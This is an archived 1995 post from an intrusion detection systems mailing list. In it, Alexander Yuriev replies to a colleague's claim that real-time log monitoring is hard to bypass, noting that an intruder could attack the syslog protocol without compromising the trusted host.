[432] in Intrusion Detection Systems
Re: Good logging and real-t
daemon@ATHENA.MIT.EDU (Alexander O. Yuriev)
Fri Nov 24 11:53:42 1995
Date: Thu, 23 Nov 1995 19:17:42 -0500 (EST)
From: "Alexander O. Yuriev" <alex@bach.cis.temple.edu>
To: ids@uow.edu.au
In-Reply-To: <doug-9510211851.AA020510760@netman.eng.auburn.edu>
Reply-To: ids@uow.edu.au
On Tue, 21 Nov 1995, Doug Hughes wrote:
> Bypasses are certainly possible. However, the intruder would have to gain
> access, become root, somehow login to the remote restricted access machine
> (which by the way has rlogin, telnet, rexec, and shell stuff turned off)
> kill the program watching the logs (which would certainly make it disappear
> off the screen) and then restart it, all without the user noticing, and within
> 5 seconds..
You have just assumed something that you should not assume i.e. that in
order to bypass your system intruder need to penetrate trusted host. If I
am an intruder I am can attempt quite successfully perform attack against the
syslog protocol instead of attempting to take over the trusted system.
Best wishes,
Alex
============================================================================
Alexander O. Yuriev Email: alex@bach.cis.temple.edu
CIS Labs, TEMPLE UNIVERSITY WWW: http://bach.cis.temple.edu/personal/alex
Philadelphia, PA, USA
KeyID: 1024/D62D4489 Key Fingerprint: AE84534377CCC4E2 37B13C4D8CD3D501
Unless otherwise stated, everything above is my personal opinion and not an
opinion of any organisation affiliated with me.
=============================================================================
